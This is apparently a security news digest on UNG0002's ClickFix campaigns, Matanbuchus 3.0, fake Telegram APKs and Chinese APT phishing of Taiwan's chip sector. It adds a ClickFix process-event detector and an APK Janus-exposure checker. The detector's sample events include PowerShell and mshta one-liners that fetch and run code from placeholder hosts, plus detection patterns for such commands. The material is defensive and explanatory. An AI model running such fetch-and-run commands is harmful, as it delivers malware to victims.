UNG0002 Deploys ClickFix Technique with Custom RAT Arsenal in Multi-Campaign Operations
Cybersecurity researchers at Seqrite Labs have attributed two distinct, technically advanced cyber-espionage campaigns, Operation Cobalt Whisper (May–Sept 2024) and Operation AmberMist (Jan–May 2025), to a state-aligned Southeast Asian threat actor tracked as UNG0002. The group initially focused on defense contractors, aviation firms, and electrotechnical engineering organizations, using well-known frameworks such as Cobalt Strike and Metasploit for post-exploitation. In Operation AmberMist, targeting broadened to gaming companies, academic institutions, and software development firms. This phase marked a technical escalation, with the deployment of custom remote access tools including Shadow RAT, INET RAT, and a Blister DLL implant. These implants were delivered via phishing emails carrying LNK files that started multi-stage execution chains combining VBScript, batch, and PowerShell components to evade endpoint detection and establish persistence. UNG0002 has also adopted the "ClickFix" technique: a fake CAPTCHA verification page coaches the victim into running a command that launches a malicious PowerShell payload, so the execution is user-initiated rather than the product of an exploit. The group has gone so far as to spoof official government websites, including Pakistan's Ministry of Maritime Affairs, to lend these lures legitimacy. Its use of DLL sideloading, running malicious code through trusted signed binaries such as rasphone.exe and Node-Webkit, further underscores its operational maturity. Artifacts recovered by Seqrite contained usernames such as "The Freelancer" and "Shockwave" embedded in the code, suggesting either internal codenames or deliberate misdirection to complicate attribution. Based on infrastructure, tooling, and targeting patterns, researchers assess with high confidence that UNG0002 is conducting sustained cyber-espionage in support of geopolitical intelligence objectives, with substantial resource backing and consistent planning.
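The ClickFix chain described above leaves a characteristic process-creation trail: an interpreter (PowerShell, mshta, cmd) spawned from the shell the victim pasted the command into, with a command line that hides its window, fetches a remote stage, evaluates it in memory, and often still carries the lure's "I am not a robot" comment. The following is an added detection example, written for this digest and not taken from the Seqrite report or any UNG0002 artifact; the event records are constructed Sysmon Event ID 1-style samples, the hostnames `captcha.example` and `verify.example` are placeholders, and the indicator list and alert threshold are the author's own heuristics, not signatures published by Seqrite.

```python
import re
from dataclasses import dataclass, field

# Interpreters a ClickFix lure typically hands the pasted command to.
CLICKFIX_IMAGES = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe",
}

# Tokens common in pasted ClickFix one-liners (heuristic, assumed; not a published signature):
# hidden window, encoded command, remote fetch, in-memory eval, mshta pointed at a URL,
# and the fake-CAPTCHA comment the lure appends so the Run box "looks" like a verification step.
CLICKFIX_PATTERNS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_cmd":     re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch":    re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl)\b", re.I),
    "inmem_eval":      re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "mshta_url":       re.compile(r"mshta(?:\.exe)?\s+[\"']?https?://", re.I),
    "captcha_comment": re.compile(r"(?:not a robot|verification id|captcha)", re.I),
}


@dataclass
class Alert:
    record_id: int
    user: str
    command_line: str
    indicators: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the ClickFix indicator names matched by one process-creation event.

    The Win+R Run dialog and Explorer-launched shells run under explorer.exe; an IDE,
    build tool or script host as parent is the everyday case and is deliberately ignored.
    """
    if _basename(event["Image"]) not in CLICKFIX_IMAGES:
        return []
    if _basename(event["ParentImage"]) != "explorer.exe":
        return []
    return [name for name, rx in CLICKFIX_PATTERNS.items() if rx.search(event["CommandLine"])]


def detect_clickfix(events) -> list:
    """Alert when the lure comment is present or at least two other indicators co-occur."""
    alerts = []
    for ev in events:
        hits = score_event(ev)
        if "captcha_comment" in hits or len(hits) >= 2:
            alerts.append(Alert(ev["RecordId"], ev["User"], ev["CommandLine"], hits))
    return alerts


# Constructed sample telemetry (not real logs). Record 1 is a benign build from an editor,
# 2 and 3 are ClickFix-style Run-dialog launches, 4 is a harmless Run-dialog cmd.
SAMPLE_EVENTS = [
    {"RecordId": 1, "User": "CORP\\alice",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoLogo -NoProfile -File build.ps1"},
    {"RecordId": 2, "User": "CORP\\bob",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://captcha.example/verify.txt)" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 7712"'},
    {"RecordId": 3, "User": "CORP\\carol",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta https://verify.example/captcha.hta # "Verification ID: 4421"'},
    {"RecordId": 4, "User": "CORP\\dave",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for a in detect_clickfix(SAMPLE_EVENTS):
        print(f"record {a.record_id} user={a.user} indicators={a.indicators}")
```

Parent-process context is what keeps this rule quiet in practice: the same `-w hidden -c "iex (irm ...)"` string is routine from an RMM agent or CI runner, so the rule only fires for interpreters launched from explorer.exe, which is where a pasted Run-dialog command lands. A Sysmon deployment that also logs the clipboard (Event ID 24) or the `RunMRU` registry key gives a second, independent source to corroborate these hits.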
Matanbuchus 3.0 Abuses Microsoft Teams for Initial Access
Matanbuchus 3.0, a malware-as-a-service (MaaS) loader, has resurfaced with enhanced features designed to improve stealth and detection evasion. Originally marketed in 2021 on Russian-speaking cybercrime forums, the latest variant was observed in a July 2025 attack in which threat actors impersonated an IT help desk during a Microsoft Teams call. Victims were persuaded to launch Quick Assist, which granted the attackers remote access and let them run a PowerShell script that executed Matanbuchus. The loader was delivered as a renamed Notepad++ updater alongside a malicious DLL, which the legitimate signed executable loaded via DLL sideloading. Once executed, the malware collected system data, scanned for security tools, and checked for administrative privileges before contacting its command-and-control (C2) infrastructure. It then downloaded additional payloads as MSI installers and executables, extending the attack chain. Matanbuchus 3.0 includes support for CMD and PowerShell reverse shells, in-memory execution, and obfuscation enhancements that make it harder to detect with signature-based tools. It leverages living-off-the-land binaries (LOLBins) such as regsvr32, rundll32, and msiexec, along with COM hijacking and shellcode injection, for persistence and execution. The loader enumerates running processes, services, and installed applications, giving attackers a detailed snapshot of the compromised environment. Its creation of scheduled tasks through the COM task-scheduler interface, rather than by invoking a Windows command-line utility such as schtasks.exe, removes a process-creation event that defenders commonly alert on and illustrates the loader's incremental investment in stealth. The campaign reflects a broader trend in which enterprise communication platforms such as Microsoft Teams and Zoom are being abused for initial access.
Matanbuchus’s continued development and high rental cost (up to $15,000 per month) show it remains a premium tool favored by organized threat actors for delivering ransomware and Cobalt Strike payloads.
Rogue Domains Spread Fake Telegram APKs in Mobile Malware Surge
Researchers at PreCrime Labs uncovered a mobile malware campaign involving over 600 malicious domains used to distribute fake Telegram APKs. These phishing sites, primarily written in Chinese and registered through the Gname registrar, mimic Telegram branding and redirect victims via QR codes to a central domain, zifeiji[.]asia, which serves the malicious APKs. The APKs are signed only with the legacy Android v1 (JAR) signature scheme, which leaves them exposed to the Janus flaw: on unpatched Android 5.0–8.0 devices, a v1-only APK can be modified without invalidating its original signature. Once installed, the malware requests broad permissions, including file access, and communicates over cleartext protocols such as HTTP and FTP. It uses MediaPlayer and socket callbacks to execute remote commands, enabling real-time surveillance and data theft. The phishing sites also use SEO tricks and typosquatted Telegram domains to increase visibility and trick users. The campaign's infrastructure includes a tracking JavaScript file (ajs[.]js) that fingerprints victims and sends data to an external analytics server. Researchers also found that a linked Firebase database (tmessages2) appears abandoned, creating a risk of Firebase hijacking if attackers re-register it to reconnect to dormant implants. The campaign spans multiple TLDs, including [.]com, [.]xyz, and [.]online, and the payload size and obfuscation techniques suggest ongoing refinement. The APKs, roughly 60–70 MB in size, give the operators remote control of and persistence on the infected device. To counter these threats, security teams should employ automated domain monitoring, block installs from unknown sources, and use multi-source threat intelligence to validate APKs and domains. This case highlights the convergence of mobile malware, phishing, and infrastructure abuse to execute stealthy, scalable Android-based attacks.
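Whether an APK carries only a v1 signature, and is therefore Janus-exposed as described above, can be decided from the file alone: v1 signing shows up as `META-INF/*.SF` plus a `*.RSA`/`*.DSA`/`*.EC` entry, while the v2 and v3 schemes live in an APK Signing Block placed immediately before the ZIP central directory and tagged with fixed scheme IDs. The check below is an added example for this digest, not tooling from PreCrime Labs; the APKs it inspects are constructed in-memory placeholders (no real certificate or signature is produced or verified), and `add_fake_signing_block` exists only to build a v2-tagged test file. The block layout, the scheme IDs (0x7109871a for v2, 0xf05368c0 for v3, 0x1b93ad61 for v3.1) and the CVE number are from the public Android documentation and are stated as facts, not assumptions.

```python
import struct
import zipfile
from io import BytesIO

APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"
SIG_SCHEME_IDS = {0x7109871A: "v2", 0xF05368C0: "v3", 0x1B93AD61: "v3.1"}


def find_eocd(data: bytes) -> int:
    """Offset of the End-Of-Central-Directory record (last 'PK\\x05\\x06' in the tail)."""
    tail = data[-(22 + 0xFFFF):]          # 22-byte record plus up to 65535 bytes of comment
    idx = tail.rfind(b"PK\x05\x06")
    if idx < 0:
        raise ValueError("not a zip: no EOCD record")
    return len(data) - len(tail) + idx


def central_directory_offset(data: bytes) -> int:
    return struct.unpack_from("<I", data, find_eocd(data) + 16)[0]


def signing_schemes(data: bytes) -> set:
    """Return the signature schemes present in an APK: any of 'v1', 'v2', 'v3', 'v3.1'.

    Presence only: this does not verify the signatures, it reports which schemes exist.
    """
    schemes = set()
    with zipfile.ZipFile(BytesIO(data)) as zf:
        names = zf.namelist()
    # v1 (JAR) signing: META-INF/*.SF with a matching *.RSA, *.DSA or *.EC signature file.
    if any(n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC")) for n in names):
        schemes.add("v1")
    cd_off = central_directory_offset(data)
    # APK Signing Block, when present, directly precedes the central directory:
    #   uint64 size | id-value pairs | uint64 size | 16-byte magic   (sizes exclude the first field)
    if cd_off >= 24 and data[cd_off - 16:cd_off] == APK_SIG_BLOCK_MAGIC:
        size = struct.unpack_from("<Q", data, cd_off - 24)[0]
        pos = cd_off - size - 8 + 8           # first id-value pair
        end_of_pairs = cd_off - 24
        while pos < end_of_pairs:
            pair_len = struct.unpack_from("<Q", data, pos)[0]
            pair_id = struct.unpack_from("<I", data, pos + 8)[0]
            if pair_id in SIG_SCHEME_IDS:
                schemes.add(SIG_SCHEME_IDS[pair_id])
            pos += 8 + pair_len
    return schemes


def janus_exposed(data: bytes, api_level: int) -> bool:
    """Janus (CVE-2017-13156) lets a v1-signed APK be altered while its signature still validates
    on unpatched Android 5.0-8.0 (API 21-26). A v2/v3 block defeats it, but only on Android 7.0+
    (API 24+), which verifies that block; older releases fall back to v1 checks regardless."""
    schemes = signing_schemes(data)
    if "v1" not in schemes or not 21 <= api_level <= 26:
        return False
    return api_level < 24 or not (schemes & {"v2", "v3", "v3.1"})


def build_v1_apk() -> bytes:
    """Constructed minimal v1-style APK with placeholder entries (no real signature)."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00")
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
        zf.writestr("META-INF/CERT.RSA", b"\x30\x82placeholder")
    return buf.getvalue()


def add_fake_signing_block(apk: bytes, scheme_id: int = 0x7109871A) -> bytes:
    """Test helper: insert an APK Signing Block with one placeholder pair before the central directory."""
    value = b"\x00" * 32                              # stand-in for real signer data
    pair = struct.pack("<QI", 4 + len(value), scheme_id) + value
    size = len(pair) + 8 + 16                         # pairs + trailing size field + magic
    block = struct.pack("<Q", size) + pair + struct.pack("<Q", size) + APK_SIG_BLOCK_MAGIC
    eocd = find_eocd(apk)
    cd_off = struct.unpack_from("<I", apk, eocd + 16)[0]
    out = bytearray(apk[:cd_off] + block + apk[cd_off:])
    struct.pack_into("<I", out, eocd + len(block) + 16, cd_off + len(block))  # fix CD offset in EOCD
    return bytes(out)


if __name__ == "__main__":
    v1_only = build_v1_apk()
    print("v1-only:", signing_schemes(v1_only), "Janus on Android 8.0:", janus_exposed(v1_only, 26))
    v2 = add_fake_signing_block(v1_only)
    print("v1+v2:  ", signing_schemes(v2), "Janus on Android 8.0:", janus_exposed(v2, 26))
```

Run against a real APK, `signing_schemes(open(path, "rb").read())` returning `{'v1'}` is the red flag this campaign's samples would raise; `apksigner verify --print-certs -v` from the Android SDK gives the same answer with full signature verification, and is the tool to trust when it is available. The `api_level` argument matters because Janus was fixed in the December 2017 Android security bulletin, so a patched 8.0 device is not exposed even to a v1-only APK; the function models the unpatched range the page describes.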
Chinese APTs Target Taiwan's Semiconductor Supply Chain
Between March and June 2025, multiple Chinese state-sponsored threat groups launched targeted cyber-espionage campaigns against Taiwan's semiconductor sector, aiming to infiltrate companies across the design, manufacturing, and financial investment ecosystems. Proofpoint attributed these operations to three clusters, UNK_FistBump, UNK_DropPitch, and UNK_SparkyCarp, each employing spear-phishing tailored to its targets. UNK_FistBump impersonated graduate students to lure HR personnel into opening LNK files disguised as resumes, resulting in the deployment of Cobalt Strike or a custom backdoor called Voldemort. This backdoor, previously tied to the APT41-aligned group TA415, was used in a distinct fashion by FistBump, with a unique loader and hardcoded IP-based C2 infrastructure. UNK_DropPitch targeted investment analysts with emails whose embedded links delivered a malicious DLL inside ZIP files. The dropped backdoor, HealthKick, enabled command execution and data exfiltration, while follow-on stages used reverse shells and Intel EMA for deeper access. UNK_SparkyCarp focused on credential phishing, using a custom adversary-in-the-middle (AitM) kit to impersonate account login alerts sent to employees of a Taiwanese chip company; victims were directed to a credential-harvesting site, and the messages carried embedded tracking beacons. Taken together, these campaigns show an interest not only in semiconductor design but in the broader strategic and financial layers surrounding the industry. Infrastructure tied to the campaigns revealed the use of SoftEther VPN servers and recycled TLS certificates previously associated with malware such as SideWalk and MoonBounce, hinting at either shared tooling or common infrastructure among China-aligned APTs.
Additionally, a fourth group, UNK_ColtCentury (also known as TAG-100 or Storm-2077), was observed engaging in benign, legitimate-looking correspondence to establish rapport before delivering the Spark RAT for remote access. Collectively, these efforts reflect China's sustained priority on reducing dependency on foreign semiconductor supply chains, especially under tightening export restrictions from Taiwan and the U.S. The technical sophistication, reuse of implants, and diverse targeting indicate long-term investment in espionage capabilities designed to advance China's strategic industrial ambitions.